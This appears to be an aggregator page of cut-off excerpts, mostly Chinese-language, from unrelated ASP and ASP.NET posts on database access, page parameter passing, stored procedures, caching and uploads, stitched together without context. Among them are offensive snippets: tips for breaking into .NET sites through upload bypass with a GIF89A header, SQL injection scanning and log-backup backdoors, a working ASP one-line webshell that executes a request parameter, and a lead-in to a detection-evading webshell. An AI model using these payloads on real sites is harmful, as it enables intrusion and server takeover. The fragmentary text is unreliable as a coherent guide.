ASP

     OleDbConnection conn = new OleDbConnection("Provider=Microsoft.Jet.OLEDB.4.0;Data  Source="+filename+";User ID=Admin;Password=;Extended properties=Excel 8.0");    conn.Open();     DataTable dt=conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new

<% 語句 …… %> <2>定義變數dim語句 <% dim a,b a=10 b=”ok!” %> 注意：定義的變數可以是數值型，也可以是字元或者其他類型的 <3>簡單的控制流程程語句 1. If 條件1 then 語句1 elseif 條件2 then 語句2 else 語句3 endif 2.while 條件 語句 wend 3.for count=1 to n step m 語句1 exit for 語句2 next

1. Get(即使用QueryString顯式傳遞)     方式：在url後面跟參數。     特點：簡單、方便。     缺點：字串長度最長為255個字元；資料泄漏在url中。     適用資料：簡單、少量、關鍵的資料。     適用範圍：傳遞給自己、傳遞給另一個目標頁面；常用於2個頁面間傳遞資料。     用法：例如：url後加?UserID=…，跳轉到目標頁面，目標頁面在伺服端可用Request.QueryString["InputText"]擷取其指定參數值。2. Post    

一、使用QuerystringQuerystring是一種非常簡單的傳值方式，其缺點就是會把要傳送的值顯示在瀏覽器的地址欄中，並且在此方法中不能夠傳遞對象。如果你想傳遞一個安全性不是那麼太重要或者是一個簡單的數值時，用此方法最好不過了。下面通過一個小例子來完成傳值工作，步驟如下：1、建立一個web form2、在建立的web form中放置一個button1，在放置兩個TextBox1,TextBox2 3、為button按鈕建立click事件代碼如下：private void Button1_

詳細說明:今天下午看了一個下午的動網代碼，頭甚是疼，於是晚上回來，找找動易還有其他漏洞沒，結果一看，還真有一處，邏輯錯誤！在Region.asp中Country = ReplaceBadChar(Trim(Request(\\\"Country\\\")))Province = ReplaceBadChar(Trim(Request(\\\"Province\\\")))City =

1、對一般遇到.net的網站時通常會註冊個使用者第一選擇利用上傳判斷的漏洞 加圖標題GIF89A 順利饒過2、第二種就是注入了, 在?id=xx後加單引號 " ' "一般情況下 用NBSI 啊D來SCAN 都可以發現BUG頁面而且國內大多.net都是使用MSSQL資料庫發現注入點也可以從login下手 其實這個方法目前的成功率在75%3、不過遇到搜尋型的,和沒錯誤資訊回顯的時候 在這裡就卡住了大家可以看看網上一篇 搜尋型注入的文章 運氣好,資料庫和WEB在一起直接在搜尋裡寫備份LOG語句

今天在LCX牛牛的BLOG上看到了一個新的繞過那個什麼查ASP 馬的東西。。怎麼說呢，其實如果單說寫檔案到伺服器上來留後門的話。可能大概也只有10多種方法吧可以繞過吧。但是像這種可以直接執行的，好象還少著。。既然他們都公布得愉快。我也發一個我覺得拿得出手的吧。等著那些檢測程式加入新的特徵吧，啊哈哈。引用 <%set sobiny =

首先回顧一下以前ASP一句話的經典木馬吧！<%if request("nonamed")<>"" then execute request("nonamed")%>VBS中execute就是動態運行指定的代碼而JSCRIPT中也同樣有eval函數可以實現,也就是說ASP一句話木馬也有個版本是採用JSCRIPT的 eval的！網上也有例子我就不多說了！.....然後解析語言終究發展成為中間代碼例如java .net  動態執行也就不存在了！之前ASP中正常情況只支援VBS 

                                ASP.NET Portal Starter Kit中的角色驗證今天看了一下ASP.NET Portal Starter Kit的登入驗證,現在做個小結,對於使用者----許可權----角色的關係及實現請參看我寫的http://www.cnblogs.com/supercode/archive/2005/06/15/174306.html#174583當然原理和Asp.NET

以下是SQL中兩個預存程序:  CREATE PROCEDURE dbo.oa_selectalluser  AS     select * from UserInfo GO CREATE PROCEDURE dbo.oa_SelectByID     @id int AS     select * from UserInfo where ID=@id GO 一個是帶參數的預存程序,一個是不帶參數的預存程序.下面介紹怎麼在VS2005中使用這兩個預存程序. (一).不帶參數的預存程序: prot

<%db="/book.mdb"Set conn = Server.CreateObject("ADODB.Connection")connstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(db)conn.Open connstrSet rs=Server.CreateObject("ADODB.Recordset")sql="Select * from ebook "rs.open

1、以下4個DLL為MVC架構引用，在程式中將引用屬性設為複製到本地。System.ComponentModel.DataAnnotations.dllSystem.Web.Abstractions.dllSystem.Web.Mvc.dllSystem.Web.Routing.dll　　2、按如下修改，並在開發時注意所有連結使用Url.Action方法來得到，將使程式既可以在IIS5、6下運行，又能在IIS7下保持URL的美觀Web.config的配置項按如下修改：

來源：http://www.cnblogs.com/xtgyiq/archive/2009/07/06/1517415.html 代碼Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.CodeHighlighter.com/-->        protected void Button1_Click(object sender, EventArgs e)        {            

From: http://blogs.worldnomads.com.au/matthewb/archive/2004/01/12/194.aspxIts suprising how many people are attempting to do team development with ASP.NET, or even just .NET, and have not even known about nor read the Team Development with Visual

前言 從第一次接觸 asp.net 到現在差不多快兩年了。在這兩年時間裡，我碰到了大堆大堆的問題，不知道敖過多少個通宵，從空白開始逐漸瞭解和認識 HTML 文法、用戶端指令碼、asp.net 的架構等。我很願意將我的一些經驗拿出來和大家一起分享。當然也免不了錯誤和瞭解不夠深入的地方，也非常歡迎大家的任何意見和評論！ 我以後將逐漸寫一個《漫談 asp.net》的系列文章。在這些文章裡面，將會涉及到 Web 應用程式的結構、編程模式、Web

以下是使用html控制項<input type="file">上傳檔案時遇到的一些問題總結，方便大家查閱：1. 如果直接用<input type="file"...></input>html用戶端控制項選擇檔案，必須要在<input type="file">控制項中加入name屬性，否則服務端無法擷取控制項值（即檔案）2.

緩衝的作用相信大家都很清楚，我就不多說了。大家可以看看這篇文章： ASP.NET Micro Caching: Benefits of a One-Second Cache 。 另外，也推薦大家閱讀這篇文章： Caching Architecture Guide for .NET Framework Applications 。 1. asp.net 緩衝功能的不足 在 .net framework 中，我們用到緩衝最多的地方應該就是使用 asp.net 中的快取服務(

http://www.cnblogs.com/caizinet/archive/2005/05/11/152908.html近日在csdn論壇上找到了這段代碼，可以像asp一樣把頁面匯出到excel，這樣就可以匯出一些比較複雜的excel頁面，而不用模板之類的複雜方式了！public void OutPutExcel()        {            //定義文件類型、字元編碼            Response.Clear();　　        Response.Buffer=

代碼Code highlighting produced by Actipro CodeHighlighter (freeware)http://www.CodeHighlighter.com/--><%@ Page Language="C#" AutoEventWireup="true" CodeFile="Default5.aspx.cs" Inherits="Default5" %><%@ import namespace="System.IO"  %><%@

原文參考：http://forums.asp.net/t/980311.aspx 在GridView中使用如下代碼會出現解析錯誤：<asp:LinkButton ID="DeleteButton" runat="server" CausesValidation="False" CommandName="Delete"      OnClientClick='return confirm("Delete the datasource <%# Eval("Title") %>?")